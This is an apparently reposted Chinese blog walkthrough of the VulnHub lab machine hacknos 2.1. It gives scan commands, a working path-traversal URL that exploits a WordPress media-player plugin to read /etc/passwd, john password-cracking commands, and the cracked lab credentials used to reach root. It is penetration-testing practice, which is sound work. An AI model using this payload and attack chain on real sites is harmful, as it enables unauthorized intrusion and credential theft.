vulnhub之hacknos 2.1的实践

admin 2022年4月20日03:30:19评论27 views字数 993阅读3分18秒阅读模式

今天实践的是vulnhub的hacknos 2.1镜像,这是vulnhub系列阶段性的最后一个镜像,断断续续三年,终于把存货清空了,

用workstation导入成功,但扫描不到地址,重新用virtualbox导入,

再次地址扫描,sudo netdiscover -r 192.168.1.0/24,

vulnhub之hacknos 2.1的实践确认一下是192.168.1.107,

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.107,

vulnhub之hacknos 2.1的实践

再接着做web目录爆破,sudo dirb http://192.168.1.107,

vulnhub之hacknos 2.1的实践

浏览器访问http://192.168.1.107/tsweb,

vulnhub之hacknos 2.1的实践

发现是wordpress,扫一下都有哪些插件,

sudo wpscan --url http://192.168.1.107/tsweb --enumerate ap,

vulnhub之hacknos 2.1的实践

网上搜一下gracemedia-media-player 1.0,

vulnhub之hacknos 2.1的实践

看来是有本地文件包含漏洞,

从https://www.exploit-db.com/exploits/46537查到漏洞利用方法,

访问http://192.168.1.107/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd,

vulnhub之hacknos 2.1的实践

发现flag用户,密码的hash是$1$flag$vqjCxzjtRc7PofLYS2lWf/,

$1$代表hash算法是md5,密码hash放到文件里,做一下爆破,

sudo john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hash,

vulnhub之hacknos 2.1的实践

就得到了账户密码对flag/topsecret,ssh登录一下,

发现/home下有rohit用户,并在/var/backups/passbkp/md5-hash发现密码hash,$1$rohit$01Dl0NQKtgfeL08fGrggi0,继续爆破,

vulnhub之hacknos 2.1的实践

得到账户密码对rohit/!%hack41,切用户,发现可以sudo到root,

vulnhub之hacknos 2.1的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之hacknos 2.1的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日03:30:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之hacknos 2.1的实践http://cn-sec.com/archives/919898.html

发表评论

匿名网友 填写信息